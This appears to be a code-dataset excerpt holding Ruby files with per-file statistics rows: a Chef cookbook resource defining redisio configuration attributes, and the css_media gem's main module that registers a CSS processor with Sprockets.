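        #   settings.query(:comments, 'SELECT * FROM comments')  # name + string
        #   settings.query(:comments, -> { 'SELECT * FROM comments' })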
end
end
end
end
| 28.346154 | 87 | 0.588422 |
2142836a83133a61512208d26d89d86bf1011f37 | 1,257 | #
# Cookbook Name:: redisio
# Resource::configure
#
# Copyright 2013, Brian Bianco <[email protected]>
# Copyright 2013, Rackspace Hosting <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
actions :run
# Uncomment this and remove the block in initialize
# when ready to drop support for chef <= 0.10.8
#default_action :run
# Configuration attributes
attribute :version, kind_of: String
attribute :base_piddir, kind_of: String, default: '/var/run/redis'
attribute :user, kind_of: String, default: 'redis'
attribute :group, kind_of: String, default: 'redis'
attribute :default_settings, kind_of: Hash
attribute :servers, kind_of: Array
def initialize(name, run_context = nil)
super
@action = :run
@tarball = nil
end
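# A minimal usage sketch in a recipe (the resource name and values are assumed
# from this file's attributes, not verified against the cookbook's providers):
#
#   redisio_configure 'redis-config' do
#     version '2.8.5'
#     default_settings node['redisio']['default_settings']
#     servers node['redisio']['servers']
#   end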
| 31.425 | 74 | 0.755768 |
62b8047de8565cbf1ac998441e66a85576efcff0 | 857 | require "css_media/version"
module CssMedia
autoload :Sprockets, 'css_media/sprockets'
# Add prefixes to `css`. See `Processor#process` for options.
def self.process(css, opts = { })
params = { }
# params[:browsers] = opts.delete(:browsers) if opts.has_key?(:browsers)
Processor.new(params).process(css, opts)
end
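  # A minimal usage sketch (the CSS string is illustrative; options are
  # forwarded to Processor#process):
  #
  #   css = '@media (max-width: 600px) { body { color: red; } }'
  #   CssMedia.process(css)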
# Add Autoprefixer for Sprockets environment in `assets`.
  # You can specify the browsers relevant to your project.
def self.install(assets, opts = {})
Sprockets.register_processor(Processor.new(opts))
Sprockets.install(assets)
end
# Disable installed Autoprefixer
def self.uninstall(assets)
Sprockets.uninstall(assets)
end
end
require_relative 'css_media/result'
require_relative 'css_media/version'
require_relative 'css_media/processor'
require_relative 'css_media/railtie' if defined?(Rails)
| 27.645161 | 76 | 0.738623 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.